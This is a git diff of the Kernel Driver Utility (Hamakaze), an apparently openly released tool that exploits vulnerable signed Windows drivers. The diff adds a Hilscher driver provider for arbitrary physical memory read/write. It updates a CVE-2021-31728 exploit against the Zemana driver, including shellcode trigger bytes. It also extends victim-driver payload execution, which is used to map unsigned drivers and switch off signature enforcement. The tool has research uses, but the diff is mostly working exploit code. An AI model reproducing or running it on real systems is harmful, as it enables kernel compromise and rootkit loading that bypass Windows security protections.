+ ScFree(pvShellCode, ScSizeOf(Context->ShellVersion, NULL));
+
FUNCTION_LEAVE_MSG(__FUNCTION__);
return bSuccess;
diff --git a/Source/Hamakaze/idrv/hilscher.cpp b/Source/Hamakaze/idrv/hilscher.cpp
new file mode 100644
index 0000000..461bdc3
--- /dev/null
+++ b/Source/Hamakaze/idrv/hilscher.cpp
@@ -0,0 +1,122 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: HILSCHER.CPP
+*
+* VERSION: 1.30
+*
+* DATE: 20 Mar 2023
+*
+* Hilscher physmem driver routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+#include "idrv/hilscher.h"
+
+/*
+* PhmpReadWritePhysicalMemory
+*
+* Purpose:
+*
+* Read/Write from physical memory.
+*
+*/
+BOOL WINAPI PhmpReadWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes,
+ _In_ BOOL DoWrite)
+{
+ DWORD bytesIO = 0;
+ BOOL bResult;
+ NTSTATUS ntStatus;
+ PHYSMEM_MAP_IN request;
+
+ request.ullPhysicalAddress = PhysicalAddress;
+ request.ulMapSize = NumberOfBytes;
+
+ ntStatus = supCallDriverEx(DeviceHandle,
+ IOCTL_PHYSMEM_MAP,
+ &request,
+ sizeof(request),
+ &request,
+ sizeof(request),
+ NULL);
+
+ if (!NT_SUCCESS(ntStatus)) {
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ return FALSE;
+ }
+
+ SetFilePointer(DeviceHandle, 0, NULL, FILE_BEGIN);
+
+ if (DoWrite)
+ bResult = WriteFile(DeviceHandle, Buffer, NumberOfBytes, &bytesIO, NULL);
+ else
+ bResult = ReadFile(DeviceHandle, Buffer, NumberOfBytes, &bytesIO, NULL);
+
+ return bResult;
+}
+
+/*
+* PhmReadPhysicalMemory
+*
+* Purpose:
+*
+* Read from physical memory.
+*
+*/
+BOOL WINAPI PhmReadPhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ return PhmpReadWritePhysicalMemory(DeviceHandle, PhysicalAddress, Buffer, NumberOfBytes, FALSE);
+}
+
+/*
+* PhmWritePhysicalMemory
+*
+* Purpose:
+*
+* Write to physical memory.
+*
+*/
+BOOL WINAPI PhmWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ return PhmpReadWritePhysicalMemory(DeviceHandle, PhysicalAddress, Buffer, NumberOfBytes, TRUE);
+}
+
+/*
+* PhmRegisterDriver
+*
+* Purpose:
+*
+* Set physmem access type.
+*
+*/
+BOOL WINAPI PhmRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ UNREFERENCED_PARAMETER(Param);
+
+ PHYSMEM_ACCESS_IN request;
+
+ request.ulAccessType = PHYSMEM_READWRITE_ACCESS_8BIT;
+
+ return supCallDriver(DeviceHandle, IOCTL_PHYSMEM_SETACCESS, &request, sizeof(request), NULL, 0);
+}
diff --git a/Source/Hamakaze/idrv/hilscher.h b/Source/Hamakaze/idrv/hilscher.h
new file mode 100644
index 0000000..7e871d2
--- /dev/null
+++ b/Source/Hamakaze/idrv/hilscher.h
@@ -0,0 +1,68 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2023
+*
+* TITLE: HILSCHER.H
+*
+* VERSION: 1.30
+*
+* DATE: 20 Mar 2023
+*
+* HILSCHER physmem driver interface header.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+#define PHYSMEM_READWRITE_ACCESS_8BIT 1 //byte
+#define PHYSMEM_READWRITE_ACCESS_16BIT 2 //word
+#define PHYSMEM_READWRITE_ACCESS_32BIT 3 //dword
+#define PHYSMEM_READWRITE_ACCESS_64BIT 4 //qword
+#define PHYSMEM_READWRITE_ACCESS_MEMCPY 5 //memcpy
+
+#define FILE_DEVICE_HILSCHER FILE_DEVICE_UNKNOWN
+
+#define PHYSMEM_MAP (DWORD)0x900
+#define PHYSMEM_SETACCESS (DWORD)0x901
+
+#define IOCTL_PHYSMEM_MAP \
+ CTL_CODE(FILE_DEVICE_HILSCHER, PHYSMEM_MAP,\
+ METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+
+#define IOCTL_PHYSMEM_SETACCESS \
+ CTL_CODE(FILE_DEVICE_HILSCHER, PHYSMEM_SETACCESS,\
+ METHOD_BUFFERED, FILE_READ_ACCESS | FILE_WRITE_ACCESS)
+
+//
+// Hilscher HW driver interface.
+//
+
+typedef struct _PHYSMEM_ACCESS_IN {
+ ULONG ulAccessType;
+} PHYSMEM_ACCESS_IN, * PPHYSMEM_ACCESS_IN;
+
+typedef struct _PHYSMEM_MAP_IN {
+ ULONGLONG ullPhysicalAddress;
+ ULONG ulMapSize;
+} PHYSMEM_MAP_IN, * PPHYSMEM_MAP_IN;
+
+BOOL WINAPI PhmReadPhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI PhmWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI PhmRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
diff --git a/Source/Hamakaze/idrv/procexp.cpp b/Source/Hamakaze/idrv/procexp.cpp
index fbec003..ebee86a 100644
--- a/Source/Hamakaze/idrv/procexp.cpp
+++ b/Source/Hamakaze/idrv/procexp.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: PROCEXP.CPP
*
-* VERSION: 1.20
+* VERSION: 1.30
*
-* DATE: 08 Feb 2022
+* DATE: 20 Mar 2023
*
* Process Explorer driver routines.
*
@@ -24,13 +24,16 @@ HANDLE g_PexPhysicalMemorySection = NULL;
static KDU_VICTIM_PROVIDER g_ProcExpVictimSelf{
(LPCWSTR)PROCEXP152, // Device and driver name
- (LPCWSTR)PROCEXP_DESC, // Description
- IDR_PROCEXP, // Resource id in drivers database
- GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
+ (LPCWSTR)PROCEXP1627_DESC, // Description
+ IDR_PROCEXP1627, // Resource id in drivers database
+ KDU_VICTIM_PE1627, // Victim id
+ SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
KDU_VICTIM_FLAGS_NONE, // Victim flags, target dependent
VpCreateFromExistingCallback, // Victim create callback
VpReleaseCallbackStub, // Victim release callback
- VpExecuteFromExistingCallback // Victim execute payload callback
+ VpExecuteFromExistingCallback, // Victim execute payload callback
+ &g_ProcExpSig, // Victim dispatch bytes
+ sizeof(g_ProcExpSig) // Victim dispatch bytes size
};
/*
diff --git a/Source/Hamakaze/idrv/winring0.cpp b/Source/Hamakaze/idrv/winring0.cpp
index d203ef6..608a4f6 100644
--- a/Source/Hamakaze/idrv/winring0.cpp
+++ b/Source/Hamakaze/idrv/winring0.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: WINRING0.CPP
*
-* VERSION: 1.27
+* VERSION: 1.30
*
-* DATE: 08 Nov 2022
+* DATE: 20 Mar 2023
*
* WinRing0 based drivers routines.
*
@@ -44,7 +44,7 @@ BOOL WRZeroReadPhysicalMemory(
return supCallDriver(DeviceHandle,
IOCTL_OLS_READ_MEMORY,
&request,
- sizeof(request),
+ sizeof(OLS_READ_MEMORY_INPUT),
Buffer,
NumberOfBytes);
}
diff --git a/Source/Hamakaze/idrv/zemana.cpp b/Source/Hamakaze/idrv/zemana.cpp
index ed9ae09..e36f0fe 100644
--- a/Source/Hamakaze/idrv/zemana.cpp
+++ b/Source/Hamakaze/idrv/zemana.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: ZEMANA.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Zemana driver routines.
*
@@ -52,7 +52,7 @@ typedef struct _ZM_SCSI_ACCESS {
} ZM_SCSI_ACCESS, * PZM_SCSI_ACCESS;
typedef struct _ZM_SCSI_MINIPORT_FIX {
- CHAR DriverName[260];
+ CHAR DriverName[MAX_PATH];
ULONG32 Offset_Func1;
UCHAR FixCode_Func1[128];
ULONG32 Offset_Func2;
@@ -268,20 +268,37 @@ BOOL ZmExploit_CVE2021_31728(
printf_s("[+] Stager shellCode allocated at 0x%llX\r\n", kernelShellCode);
+ CHAR szDriverName[MAX_PATH];
+
+ RtlSecureZeroMemory(&szDriverName, sizeof(szDriverName));
+
+
//
// Trigger shellcode.
//
- ZM_SCSI_MINIPORT_FIX MiniportFix = {
- "ZemanaAntimalware.sys",
- 0xD553, //driver specific offset, correct it for another sample
- {
- 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax, imm64
- 0x80, 0x05, 0x01, 0x00, 0x00, 0x00, 0x10, // add byte ptr [rip+0], 0x10
- 0xFF, 0xC0, // inc eax -> call rax (after the self-modifying)
- 0xEB, 0x00 // jmp rel8
- }
+ ZM_SCSI_MINIPORT_FIX MiniportFix;
+ ANSI_STRING drvFileName;
+
+ RtlSecureZeroMemory(&MiniportFix, sizeof(MiniportFix));
+
+ drvFileName.Buffer = NULL;
+ drvFileName.Length = drvFileName.MaximumLength = 0;
+
+ ntsupConvertToAnsi(Context->Provider->LoadData->DriverName, &drvFileName);
+
+ StringCchPrintfA(MiniportFix.DriverName, MAX_PATH, "%s.sys", drvFileName.Buffer);
+
+ MiniportFix.Offset_Func1 = 0xD553; //driver specific offset, correct it for another sample
+
+ BYTE patchCode[] =
+ { 0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov rax, imm64
+ 0x80, 0x05, 0x01, 0x00, 0x00, 0x00, 0x10, // add byte ptr [rip+0], 0x10
+ 0xFF, 0xC0, // inc eax -> call rax (after the self-modifying)
+ 0xEB, 0x00 // jmp rel8
};
+ RtlCopyMemory(MiniportFix.FixCode_Func1, patchCode, sizeof(patchCode));
+
//
// Point the call to it.
//
@@ -354,36 +371,50 @@ BOOL ZmMapDriver(
do {
if (VpCreate(victimProv,
Context->ModuleBase,
- &victimDeviceHandle))
+ &victimDeviceHandle,
+ NULL,
+ NULL))
{
- printf_s("[+] Victim is accepted, handle 0x%p\r\n", victimDeviceHandle);
+ printf_s("[+] Victim is loaded, handle 0x%p\r\n", victimDeviceHandle);
}
else {
supPrintfEvent(kduEventError,
- "[!] Could not accept victim target, GetLastError %lu\r\n", GetLastError());
+ "[!] Could not load victim target, GetLastError %lu\r\n", GetLastError());
}
- PRTL_PROCESS_MODULE_INFORMATION target;
- PRTL_PROCESS_MODULES modulesList = (PRTL_PROCESS_MODULES)supGetLoadedModulesList(FALSE, NULL);
- if (modulesList) {
+ VICTIM_DRIVER_INFORMATION vdi;
- target = (PRTL_PROCESS_MODULE_INFORMATION)ntsupFindModuleEntryByName(modulesList, "procexp152.sys");
- if (target) {
- dispatchAddress = (ULONG_PTR)target->ImageBase;
- }
+ RtlSecureZeroMemory(&vdi, sizeof(vdi));
- supHeapFree(modulesList);
+ if (!VpQueryInformation(Context->Victim, VictimDriverInformation, &vdi, sizeof(vdi))) {
+ supPrintfEvent(kduEventError,
+ "[!] Could not query victim driver information, GetLastError %lu\r\n", GetLastError());
+ break;
}
+ dispatchAddress = vdi.LoadedImageBase;
+
if (dispatchAddress == 0) {
supPrintfEvent(kduEventError,
"[!] Could not query victim target\r\n");
break;
}
+
+ VICTIM_IMAGE_INFORMATION vi;
+
+ RtlSecureZeroMemory(&vi, sizeof(vi));
+
+ if (!VpQueryInformation(
+ Context->Victim, VictimImageInformation, &vi, sizeof(vi)))
+ {
+ supPrintfEvent(kduEventError,
+ "[!] Could not query victim image information, GetLastError %lu\r\n", GetLastError());
+ break;
+ }
- dispatchAddress += PE152_DISPATCH_OFFSET;
+ dispatchAddress += vi.DispatchOffset;
printf_s("[+] Victim target 0x%llX\r\n", dispatchAddress);
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index 8ed591f..2c79e6c 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: KDUPLIST.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 02 Dec 2022
+* DATE: 20 Mar 2023
*
* Providers global list.
*
@@ -39,6 +39,7 @@
#include "idrv/asrdrv.h"
#include "idrv/alcpu.h"
#include "idrv/ryzen.h"
+#include "idrv/hilscher.h"
//
// Victims public array.
@@ -46,14 +47,32 @@
static KDU_VICTIM_PROVIDER g_KDUVictims[] = {
{
(LPCWSTR)PROCEXP152, // Device and driver name,
- (LPCWSTR)PROCEXP_DESC, // Description
- IDR_PROCEXP, // Resource id in drivers database
- GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
+ (LPCWSTR)PROCEXP1627_DESC, // Description
+ IDR_PROCEXP1627, // Resource id in drivers database
+ KDU_VICTIM_PE1627, // Victim id
+ SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
KDU_VICTIM_FLAGS_SUPPORT_RELOAD, // Victim flags, target dependent
VpCreateCallback, // Victim create callback
VpReleaseCallback, // Victim release callback
- VpExecuteCallback // Victim execute payload callback
+ VpExecuteCallback, // Victim execute payload callback
+ & g_ProcExpSig, // Victim dispatch bytes
+ sizeof(g_ProcExpSig) // Victim dispatch bytes size
+ },
+
+ {
+ (LPCWSTR)PROCEXP152, // Device and driver name,
+ (LPCWSTR)PROCEXP1702_DESC, // Description
+ IDR_PROCEXP1702, // Resource id in drivers database
+ KDU_VICTIM_PE1702, // Victim id
+ SYNCHRONIZE | GENERIC_READ | GENERIC_WRITE, // Desired access flags used for acquiring victim handle
+ KDU_VICTIM_FLAGS_SUPPORT_RELOAD, // Victim flags, target dependent
+ VpCreateCallback, // Victim create callback
+ VpReleaseCallback, // Victim release callback
+ VpExecuteCallback, // Victim execute payload callback
+ & g_ProcExpSig, // Victim dispatch bytes
+ sizeof(g_ProcExpSig) // Victim dispatch bytes size
}
+
};
//
@@ -743,7 +762,7 @@ static KDU_PROVIDER g_KDUProviders[] =
(provUnregisterDriver)NULL,
(provPreOpenDriver)NULL,
(provPostOpenDriver)KDUProviderPostOpen,
- (provMapDriver)KDUMapDriver2,
+ (provMapDriver)KDUMapDriver,
(provControlDSE)KDUControlDSE2,
(provReadKernelVM)NULL,
@@ -767,7 +786,7 @@ static KDU_PROVIDER g_KDUProviders[] =
(provUnregisterDriver)NULL,
(provPreOpenDriver)NULL,
(provPostOpenDriver)KDUProviderPostOpen,
- (provMapDriver)KDUMapDriver2,
+ (provMapDriver)KDUMapDriver,
(provControlDSE)KDUControlDSE2,
(provReadKernelVM)NULL,
@@ -791,7 +810,7 @@ static KDU_PROVIDER g_KDUProviders[] =
(provUnregisterDriver)NULL,
(provPreOpenDriver)NULL,
(provPostOpenDriver)KDUProviderPostOpen,
- (provMapDriver)KDUMapDriver2,
+ (provMapDriver)KDUMapDriver,
(provControlDSE)KDUControlDSE2,
(provReadKernelVM)NULL,
@@ -803,6 +822,30 @@ static KDU_PROVIDER g_KDUProviders[] =
(provWritePhysicalMemory)RmWritePhysicalMemory,
(provValidatePrerequisites)RmValidatePrerequisites
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)KDUProvStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)PhmRegisterDriver,
+ (provUnregisterDriver)NULL,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)KDUProviderPostOpen,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE2,
+
+ (provReadKernelVM)NULL,
+ (provWriteKernelVM)NULL,
+
+ (provVirtualToPhysical)NULL,
+ (provQueryPML4)NULL,
+ (provReadPhysicalMemory)PhmReadPhysicalMemory,
+ (provWritePhysicalMemory)PhmWritePhysicalMemory,
+
+ (provValidatePrerequisites)NULL
}
};
diff --git a/Source/Hamakaze/kduprov.cpp b/Source/Hamakaze/kduprov.cpp
index 2a34784..cc2b926 100644
--- a/Source/Hamakaze/kduprov.cpp
+++ b/Source/Hamakaze/kduprov.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: KDUPROV.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Vulnerable drivers provider abstraction layer.
*
@@ -373,8 +373,8 @@ void KDUProvOpenVulnerableDriverAndRunCallbacks(
}
NTSTATUS ntStatus = supOpenDriver(Context->Provider->LoadData->DeviceName,
- WRITE_DAC | GENERIC_WRITE | GENERIC_READ,
- &deviceHandle);
+ SYNCHRONIZE | WRITE_DAC | GENERIC_WRITE | GENERIC_READ,
+ &deviceHandle);
if (!NT_SUCCESS(ntStatus)) {
@@ -512,7 +512,7 @@ BOOL WINAPI KDUProviderPostOpen(
deviceHandle,
NtCurrentProcess(),
&strHandle,
- GENERIC_WRITE | GENERIC_READ,
+ SYNCHRONIZE | GENERIC_WRITE | GENERIC_READ,
0,
0)))
{
@@ -679,6 +679,25 @@ HINSTANCE KDUProviderLoadDB(
return hInstance;
}
+BOOL KDUpRwHandlersAreSet(
+ _In_ PVOID ReadHandler,
+ _In_ PVOID WriteHandler
+)
+{
+ if (ReadHandler == NULL ||
+ WriteHandler == NULL)
+ {
+
+ supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
+ "\tKDU interface is not implemented for these methods.\r\n");
+
+ return FALSE;
+
+ }
+
+ return TRUE;
+}
+
/*
* KDUProviderVerifyActionType
*
@@ -688,11 +707,11 @@ HINSTANCE KDUProviderLoadDB(
*
*/
BOOL KDUProviderVerifyActionType(
- _In_ KDU_PROVIDER * Provider,
+ _In_ KDU_PROVIDER* Provider,
_In_ KDU_ACTION_TYPE ActionType)
{
BOOL bResult = TRUE;
-
+
#ifdef _DEBUG
return TRUE;
#endif
@@ -713,15 +732,33 @@ BOOL KDUProviderVerifyActionType(
return FALSE;
}
- if (Provider->LoadData->PhysMemoryBruteForce &&
- (Provider->Callbacks.ReadPhysicalMemory == NULL ||
- Provider->Callbacks.WritePhysicalMemory == NULL))
- {
- supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support physical memory read/write or\r\n"\
- "\tKDU interface is not implemented for these methods.\r\n");
-
- return FALSE;
+ if (Provider->LoadData->PreferPhysical || Provider->LoadData->PhysMemoryBruteForce) {
+
+ //
+ // Driver must have at least something defined.
+ //
+ BOOL bFirstTry = TRUE, bSecondTry = TRUE;
+
+ if (Provider->Callbacks.ReadPhysicalMemory == NULL ||
+ Provider->Callbacks.WritePhysicalMemory == NULL)
+ {
+ bFirstTry = FALSE;
+ }
+
+ if (Provider->Callbacks.ReadKernelVM == NULL ||
+ Provider->Callbacks.WriteKernelVM == NULL)
+ {
+ bSecondTry = FALSE;
+ }
+
+ if (bFirstTry == NULL && bSecondTry == NULL) {
+ supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
+ "\tKDU interface is not implemented for these methods.\r\n");
+ return FALSE;
+ }
+
}
+
break;
default:
@@ -735,16 +772,28 @@ BOOL KDUProviderVerifyActionType(
//
// Check if we can read/write.
//
- if (Provider->Callbacks.ReadKernelVM == NULL ||
- Provider->Callbacks.WriteKernelVM == NULL)
- {
- supPrintfEvent(kduEventError, "[!] Abort: selected provider does not support arbitrary kernel read/write or\r\n"\
- "\tKDU interface is not implemented for these methods.\r\n");
+ if (Provider->LoadData->PreferPhysical) {
- bResult = FALSE;
+ if (!KDUpRwHandlersAreSet(
+ (PVOID)Provider->Callbacks.ReadPhysicalMemory,
+ (PVOID)Provider->Callbacks.WritePhysicalMemory))
+ {
+ bResult = FALSE;
+ }
+
+ }
+ else {
+
+ if (!KDUpRwHandlersAreSet(
+ (PVOID)Provider->Callbacks.ReadKernelVM,
+ (PVOID)Provider->Callbacks.WriteKernelVM))
+ {
+ bResult = FALSE;
+ }
}
+
break;
case ActionTypeMapDriver:
@@ -1002,7 +1051,9 @@ PKDU_CONTEXT WINAPI KDUProviderCreate(
Context->Victim = NULL;
}
else {
- Context->Victim = &g_KDUVictims[KDU_VICTIM_DEFAULT];
+ if (prov->LoadData->VictimId >= KDU_VICTIM_MAX)
+ prov->LoadData->VictimId = KDU_VICTIM_DEFAULT;
+ Context->Victim = &g_KDUVictims[prov->LoadData->VictimId];
}
PUNICODE_STRING CurrentDirectory = &NtCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath;
diff --git a/Source/Hamakaze/kduprov.h b/Source/Hamakaze/kduprov.h
index 399f5cf..255d4ff 100644
--- a/Source/Hamakaze/kduprov.h
+++ b/Source/Hamakaze/kduprov.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2022
+* (C) COPYRIGHT AUTHORS, 2014 - 2023
*
* TITLE: KDUPROV.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 02 Dec 2022
+* DATE: 20 Mar 2023
*
* Provider support routines.
*
@@ -19,14 +19,6 @@
#pragma once
-//
-// Victim providers id
-//
-#define KDU_VICTIM_PROCEXP 0
-
-#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
-#define KDU_VICTIM_DEFAULT KDU_VICTIM_PROCEXP
-
//
// Providers abstraction interface.
//
@@ -220,13 +212,22 @@ typedef struct _KDU_CONTEXT {
typedef struct _KDU_PHYSMEM_ENUM_PARAMS {
_In_ BOOL bWrite;
+ _In_ HANDLE DeviceHandle;
+ _In_ provReadPhysicalMemory ReadPhysicalMemory;
+ _In_ provWritePhysicalMemory WritePhysicalMemory;
+
_In_opt_ PVOID pvPayload;
_In_opt_ ULONG cbPayload;
_Out_ SIZE_T ccPagesFound;
_Out_ SIZE_T ccPagesModified;
- _In_ PKDU_CONTEXT Context;
+ _In_ ULONG DispatchHandlerOffset;
+ _In_ ULONG DispatchHandlerPageOffset;
+ _In_ PVOID DispatchSignature;
+ _In_ ULONG DispatchSignatureLength;
+ _In_ ULONG JmpAddress;
+
} KDU_PHYSMEM_ENUM_PARAMS, * PKDU_PHYSMEM_ENUM_PARAMS;
ULONG KDUProvGetCount();
diff --git a/Source/Hamakaze/main.cpp b/Source/Hamakaze/main.cpp
index e551d1c..f81a823 100644
--- a/Source/Hamakaze/main.cpp
+++ b/Source/Hamakaze/main.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Hamakaze main logic and entrypoint.
*
@@ -523,7 +523,7 @@ int KDUMain()
OSVERSIONINFO osv;
#ifdef _DEBUG
- printf_s("[*] Debug Mode Run\r\n");
+ printf_s("[*] Debug Mode Run, several features (like a shellcode proper generation) will be unavailable\r\n");
#endif
FUNCTION_ENTER_MSG(__FUNCTION__);
@@ -640,7 +640,7 @@ VOID KDUIntroBanner()
{
IMAGE_NT_HEADERS* ntHeaders = RtlImageNtHeader(NtCurrentPeb()->ImageBaseAddress);
- printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - 2022 KDU Project\r\n"\
+ printf_s("[#] Kernel Driver Utility v%lu.%lu.%lu (build %lu) started, (c)2020 - 2023 KDU Project\r\n"\
"[#] Build at %s, header checksum 0x%lX\r\n"\
"[#] Supported x64 OS : Windows 7 and above\r\n",
KDU_VERSION_MAJOR,
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 2ff5b50..60a7278 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin
index ea679b8..eaa5995 100644
Binary files a/Source/Hamakaze/res/Taigei32.bin and b/Source/Hamakaze/res/Taigei32.bin differ
diff --git a/Source/Hamakaze/resource.rc b/Source/Hamakaze/resource.rc
index 9e6f0bd..3eae5a1 100644
--- a/Source/Hamakaze/resource.rc
+++ b/Source/Hamakaze/resource.rc
@@ -51,8 +51,8 @@ END
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,2,8,2212
- PRODUCTVERSION 1,2,8,2212
+ FILEVERSION 1,3,0,2303
+ PRODUCTVERSION 1,3,0,2303
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -69,12 +69,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility"
- VALUE "FileVersion", "1.2.8.2212"
+ VALUE "FileVersion", "1.3.0.2303"
VALUE "InternalName", "Hamakaze.exe"
- VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project"
+ VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Hamakaze.exe"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.2.8.2212"
+ VALUE "ProductVersion", "1.3.0.2303"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Hamakaze/shellcode.cpp b/Source/Hamakaze/shellcode.cpp
index 00ad75e..8d9a08d 100644
--- a/Source/Hamakaze/shellcode.cpp
+++ b/Source/Hamakaze/shellcode.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: SHELLCODE.CPP
*
-* VERSION: 1.27
+* VERSION: 1.30
*
-* DATE: 16 Oct 2022
+* DATE: 20 Mar 2023
*
* Default driver mapping shellcode(s) implementation.
*
@@ -1328,8 +1328,8 @@ typedef VOID(NTAPI* pfnScLoaderRoutine)(
*
*/
NTSTATUS NTAPI ScDispatchRoutineDebugSelector(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellPtr,
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer,
_In_ struct _DEVICE_OBJECT* DeviceObject,
_Inout_ struct _IRP* Irp)
{
@@ -1338,7 +1338,7 @@ NTSTATUS NTAPI ScDispatchRoutineDebugSelector(
pfnScLoaderRoutine LoaderRoutine;
} Routine;
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
Routine.LoaderRoutine = (pfnScLoaderRoutine)ScLoaderRoutineV1;
break;
@@ -1354,12 +1354,12 @@ NTSTATUS NTAPI ScDispatchRoutineDebugSelector(
break;
}
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
- Routine.LoaderRoutine(ShellPtr);
+ Routine.LoaderRoutine(ScBuffer);
return STATUS_SUCCESS;
default:
- return Routine.DispatchRoutine(DeviceObject, Irp, ShellPtr);
+ return Routine.DispatchRoutine(DeviceObject, Irp, ScBuffer);
}
}
@@ -1431,14 +1431,14 @@ ULONG_PTR ScResolveFunctionByName(
*
*/
SIZE_T ScGetViewSize(
- _In_ ULONG ShellVersion,
- _In_ PVOID ShellCodePtr
+ _In_ ULONG ScVersion,
+ _In_ PVOID ScBuffer
)
{
SIZE_T viewSize;
- PSHELLCODE pvShellCode = (PSHELLCODE)ShellCodePtr;
+ PSHELLCODE pvShellCode = (PSHELLCODE)ScBuffer;
- switch (ShellVersion) {
+ switch (ScVersion) {
case KDU_SHELLCODE_V4:
case KDU_SHELLCODE_V3:
case KDU_SHELLCODE_V2:
@@ -1460,28 +1460,28 @@ SIZE_T ScGetViewSize(
*
*/
DWORD ScSizeOf(
- _In_ ULONG ShellVersion,
